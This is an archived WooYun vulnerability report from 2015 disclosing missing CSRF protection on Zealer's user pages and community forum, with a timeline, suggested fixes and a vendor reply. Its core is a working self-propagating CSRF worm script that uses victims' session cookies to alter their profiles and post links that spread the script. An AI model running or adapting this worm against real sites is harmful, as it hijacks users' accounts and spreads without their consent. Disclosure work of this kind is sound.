WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
Disclosure timeline:
2015-08-04: Details sent to the vendor, awaiting vendor handling
2015-08-04: Vendor confirmed; details visible to the vendor only
2015-08-14: Details opened to core white hats and domain experts
2015-08-24: Details opened to regular white hats
2015-09-03: Details opened to intern white hats
2015-09-18: Details opened to the public
Hi, it's me again. How has Zealer been lately?
I'll get straight to the point. You recently opened the community (http://plus.zealer.com/), which means CSRF worms deserve close attention: the more interaction a site has, the further a worm spreads. On inspection, none of the sensitive operations in the user centre (http://www.zealer.com/user?type=info) (http://plus.zealer.com/user) has any CSRF defence (no token, no Referer check). So the question becomes: how could the community's interaction be used to maximise a CSRF attack? I wrote a simple PoC, shown below:
<html>
<body>
<script>
function submitRequest() {
  // Request 1: change the victim's avatar crop (session cookie is attached via withCredentials)
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http://www.zealer.com/user/reUpload", true);
  xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
  xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.withCredentials = true;
  var body = "x=0&y=15.084&w=400.564&h=400.56399999999996&pid=331503";
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));

  // Request 2: change the victim's profile description
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http://www.zealer.com/user/post", true);
  xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
  xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.withCredentials = true;
  var body = "description=i+love+zealer.(made+by+kevinchow)";
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));

  // Request 3: publish a community post whose content links back to the page hosting this script
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http://plus.zealer.com/sendPost/post", true);
  xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
  xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.withCredentials = true;
  var body = "type=&title=%E3%80%8CZealer%E7%A7%91%E6%8A%80%E3%80%8D%E8%8E%B7%E5%BE%97%E4%B8%80%E5%8A%A0%E4%BA%8C%E4%BD%93%E9%AA%8C%E7%9A%84%E5%B0%8F%E8%B4%B4%E5%A3%AB&tags=0&content=%3Cp%3E%E6%88%91%E6%8A%8A%E5%AE%83%E6%94%BE%E5%9C%A8%E8%BF%99%E9%87%8C%E5%B8%96%E5%AD%90%E9%87%8C%E4%BA%86%EF%BC%8C%E8%AF%B7%E7%82%B9%E5%87%BB%EF%BC%9A%3Ca+href%3D%22http%3A%2F%2Fwww.kevinchow.cn%2Fcsrf1.html%22+target%3D%22_self%22+title%3D%22aaaaaaaaa%22%3Ehttp%3A%2F%2Fplus.zealer.com%2Fpost%2F1028%3C%2Fa%3E%3C%2Fp%3E&flag=user&postTAG=&postTest=&postID=";
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
<form action="#">
  <input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
The worm script above uses XMLHttpRequest to submit forms to the server with the victim's session cookie attached (withCredentials). When a logged-in user visits the page, it silently changes their avatar and profile description and publishes a post whose content contains the URL that triggers this same script, so each victim's post recruits the next. A demo GIF: http://www.kevinchow.cn/images/Zealer_CSRF.gif
Suggested fixes: 1. Add CSRF token verification; 2. Establish a Referer whitelist.
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-08-04 13:21
Vendor reply: We were already working on the fix on the day the author carried out the attack.
Vendor evaluation: none yet